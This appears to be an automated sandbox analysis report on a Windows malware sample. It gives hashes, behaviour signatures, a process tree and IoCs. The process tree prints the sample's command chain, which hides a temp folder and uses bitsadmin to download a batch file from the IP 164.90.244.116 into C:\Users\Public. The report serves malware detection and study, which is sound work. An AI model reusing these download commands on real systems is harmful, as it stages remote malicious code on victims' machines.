Analysis
-
max time kernel
14s -
max time network
18s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
06-08-2024 02:12
Static task
static1
Behavioral task
behavioral1
Sample
ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe
Resource
win7-20240704-en
General
-
Target
ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe
-
Size
126KB
-
MD5
b2dc0f8a36a7e450b11149a8e15ca964
-
SHA1
27fd3d24a969b5b0528b69f1cbd8b293e74a6809
-
SHA256
ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15
-
SHA512
135b14382607e69e38a1e8ff3795233e0636fa29657e154270595b92804973ed96041d223eda9c71e270970df850a72b5f6b869d4b92fd51522bd52be8e8b933
-
SSDEEP
1536:06/2vO9g8CoiedwWRNxDzaoOeJSZHewWXTW6F8huRUTc333VnvwYXDBHEi4nuQr6:d/2vO9g8CNed7XaoO8SZHBX4
Malware Config
Signatures
-
Download via BitsAdmin 1 TTPs 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 19 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
bitsadmin.exebitsadmin.exeab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.execmd.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.execmd.exebitsadmin.exebitsadmin.exebitsadmin.exeattrib.execmd.exebitsadmin.exebitsadmin.execmd.exebitsadmin.execmd.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 2444 wrote to memory of 2324 2444 ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe cmd.exe PID 2444 wrote to memory of 2324 2444 ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe cmd.exe PID 2444 wrote to memory of 2324 2444 ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe cmd.exe PID 2444 wrote to memory of 2324 2444 ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe cmd.exe PID 2324 wrote to memory of 2800 2324 cmd.exe attrib.exe PID 2324 wrote to memory of 2800 2324 cmd.exe attrib.exe PID 2324 wrote to memory of 2800 2324 cmd.exe attrib.exe PID 2324 wrote to memory of 2800 2324 cmd.exe attrib.exe PID 2324 wrote to memory of 396 2324 cmd.exe cmd.exe PID 2324 wrote to memory of 396 2324 cmd.exe cmd.exe PID 2324 wrote to memory of 396 2324 cmd.exe cmd.exe PID 2324 wrote to memory of 396 2324 cmd.exe cmd.exe PID 396 wrote to memory of 2896 396 cmd.exe bitsadmin.exe PID 396 wrote to memory of 2896 396 cmd.exe bitsadmin.exe PID 396 wrote to memory of 2896 396 cmd.exe bitsadmin.exe PID 396 wrote to memory of 2896 396 cmd.exe bitsadmin.exe PID 2324 wrote to memory of 3064 2324 cmd.exe bitsadmin.exe PID 2324 wrote to memory of 3064 2324 cmd.exe bitsadmin.exe PID 2324 wrote to memory of 3064 2324 cmd.exe bitsadmin.exe PID 2324 wrote to memory of 3064 2324 cmd.exe bitsadmin.exe PID 2324 wrote to memory of 2616 2324 cmd.exe bitsadmin.exe PID 2324 wrote to memory of 2616 2324 cmd.exe bitsadmin.exe PID 2324 wrote to memory of 2616 2324 cmd.exe bitsadmin.exe PID 2324 wrote to memory of 2616 2324 cmd.exe bitsadmin.exe PID 2324 wrote to memory of 2724 2324 cmd.exe cmd.exe PID 2324 wrote to memory of 2724 2324 cmd.exe cmd.exe PID 2324 wrote to memory of 2724 2324 cmd.exe cmd.exe PID 2324 wrote to memory of 2724 2324 cmd.exe cmd.exe PID 2724 wrote to memory of 2684 2724 cmd.exe bitsadmin.exe PID 2724 wrote to memory of 2684 2724 cmd.exe bitsadmin.exe PID 2724 wrote to memory of 2684 2724 cmd.exe bitsadmin.exe PID 2724 wrote to memory of 2684 2724 cmd.exe bitsadmin.exe PID 2324 wrote to memory of 2632 2324 cmd.exe bitsadmin.exe PID 2324 wrote to memory of 2632 2324 cmd.exe bitsadmin.exe PID 2324 wrote to memory of 2632 2324 cmd.exe bitsadmin.exe PID 2324 wrote to memory of 2632 2324 cmd.exe bitsadmin.exe PID 2324 wrote to memory of 2912 2324 cmd.exe bitsadmin.exe PID 2324 wrote to memory of 2912 2324 cmd.exe bitsadmin.exe PID 2324 wrote to memory of 2912 2324 cmd.exe bitsadmin.exe PID 2324 wrote to memory of 2912 2324 cmd.exe bitsadmin.exe PID 2324 wrote to memory of 1036 2324 cmd.exe cmd.exe PID 2324 wrote to memory of 1036 2324 cmd.exe cmd.exe PID 2324 wrote to memory of 1036 2324 cmd.exe cmd.exe PID 2324 wrote to memory of 1036 2324 cmd.exe cmd.exe PID 1036 wrote to memory of 2780 1036 cmd.exe bitsadmin.exe PID 1036 wrote to memory of 2780 1036 cmd.exe bitsadmin.exe PID 1036 wrote to memory of 2780 1036 cmd.exe bitsadmin.exe PID 1036 wrote to memory of 2780 1036 cmd.exe bitsadmin.exe PID 2324 wrote to memory of 2644 2324 cmd.exe bitsadmin.exe PID 2324 wrote to memory of 2644 2324 cmd.exe bitsadmin.exe PID 2324 wrote to memory of 2644 2324 cmd.exe bitsadmin.exe PID 2324 wrote to memory of 2644 2324 cmd.exe bitsadmin.exe PID 2324 wrote to memory of 2788 2324 cmd.exe bitsadmin.exe PID 2324 wrote to memory of 2788 2324 cmd.exe bitsadmin.exe PID 2324 wrote to memory of 2788 2324 cmd.exe bitsadmin.exe PID 2324 wrote to memory of 2788 2324 cmd.exe bitsadmin.exe PID 2324 wrote to memory of 2892 2324 cmd.exe cmd.exe PID 2324 wrote to memory of 2892 2324 cmd.exe cmd.exe PID 2324 wrote to memory of 2892 2324 cmd.exe cmd.exe PID 2324 wrote to memory of 2892 2324 cmd.exe cmd.exe PID 2892 wrote to memory of 1968 2892 cmd.exe bitsadmin.exe PID 2892 wrote to memory of 1968 2892 cmd.exe bitsadmin.exe PID 2892 wrote to memory of 1968 2892 cmd.exe bitsadmin.exe PID 2892 wrote to memory of 1968 2892 cmd.exe bitsadmin.exe -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe"C:\Users\Admin\AppData\Local\Temp\ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2444 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\ytmp\t3935.bat" "C:\Users\Admin\AppData\Local\Temp\ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe" "2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2324 -
C:\Windows\SysWOW64\attrib.exeattrib +h C:\Users\Admin\AppData\Local\Temp\ytmp3⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:2800 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe /c ""Bitsadmin3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:396 -
C:\Windows\SysWOW64\bitsadmin.exeBitsadmin4⤵
- System Location Discovery: System Language Discovery
PID:2896 -
C:\Windows\SysWOW64\bitsadmin.exebitsadmin3⤵
- System Location Discovery: System Language Discovery
PID:3064 -
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /crEaTe pls3⤵
- Download via BitsAdmin
- System Location Discovery: System Language Discovery
PID:2616 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe /c ""Bitsadmin3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2724 -
C:\Windows\SysWOW64\bitsadmin.exeBitsadmin4⤵
- System Location Discovery: System Language Discovery
PID:2684 -
C:\Windows\SysWOW64\bitsadmin.exebitsadmin3⤵
- System Location Discovery: System Language Discovery
PID:2632 -
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /ResUme pls3⤵
- System Location Discovery: System Language Discovery
PID:2912 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe /c ""Bitsadmin3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1036 -
C:\Windows\SysWOW64\bitsadmin.exeBitsadmin4⤵
- System Location Discovery: System Language Discovery
PID:2780 -
C:\Windows\SysWOW64\bitsadmin.exebitsadmin3⤵
- System Location Discovery: System Language Discovery
PID:2644 -
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /CompLete pls3⤵
- System Location Discovery: System Language Discovery
PID:2788 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe /c ""Bitsadmin3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2892 -
C:\Windows\SysWOW64\bitsadmin.exeBitsadmin4⤵
- System Location Discovery: System Language Discovery
PID:1968 -
C:\Windows\SysWOW64\bitsadmin.exebitsadmin3⤵
- System Location Discovery: System Language Discovery
PID:2564 -
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /TRanSfer pls http:164.90.244.116/run2025.bat C:\Users\Public\run2025.bat3⤵
- Download via BitsAdmin
- System Location Discovery: System Language Discovery
PID:2692
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD53baa57d1131417b71e8d0bfb45f46ec3
SHA18443f01dc35d643cf2071c2dd90787d972de64f7
SHA2565911b623c6db07db3193f1ea5f9ba561c04292ec9acabf4586469aa0c77058c8
SHA5120563c9ad298a7f85880afd0f40867a6a67e13bc5a1b5c230f8545b8ba1dc896927b8eb34a54ad7880bd8d43f7108a2ede2710dcfdbf55abd9b22b0b4ef958024